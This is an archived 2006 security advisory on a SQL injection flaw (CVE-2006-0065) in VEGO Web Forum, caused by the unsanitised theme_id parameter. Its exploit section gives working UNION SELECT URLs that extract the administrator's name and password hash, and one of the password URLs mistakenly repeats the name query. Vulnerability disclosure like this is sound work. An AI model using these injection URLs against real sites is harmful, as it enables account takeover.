|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | VEGO Web Forum SQL Injection Vulnerability
|
SecurityAlert : 315
CVE : CVE-2006-0065
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : alex evuln com
Published : 07.01.2006
Affected Software : | VEGO Web Forum 1.26 and earlier |
 Advisory Content : New eVuln Advisory:
VEGO Web Forum SQL Injection Vulnerability
--------------------Summary----------------
Vendor: VEGO
Software: VEGO Web Forum
Versions: 1.26 and earlier
Critical Level: Moderate
Type: SQL Injection
Remote: yes
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (alex (at) evuln (dot) com [email
concealed])
eVuln ID: EV0001
-----------------Description--------------
Vulnerable scripts:
php/functions.php
php/functions_update.php
php/functions_display.php
Variable theme_id isn't properly sanitized before being used in a SQL
query. This can be used to make any SQL query by injecting arbitrary SQL
code.
Administrator's authentication is threatened.
-------------------Exploit-----------------
Administrator's login name.
For version 1.26:
http://hostname/webforum/index.php? theme_id=-1% 20union%20select%
201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1% 20union%20select%
201,2,name, 4%20from%20vwf_users% 20where%20userid=1/*
Hash of administrator's password.
For version 1.26:
http://hostname/webforum/index.php? theme_id=-1% 20union%20select%
201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1% 20union%20select%
201,2,pass, 4%20from%20vwf_users% 20where%20userid=1/*
--------------Credit---------------------
Original Advisory:
http://evuln.com/vulns/1/summary.html
Discovered by: Aliaksandr Hartsuyeu (alex (at) evuln (dot) com [email
concealed])
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|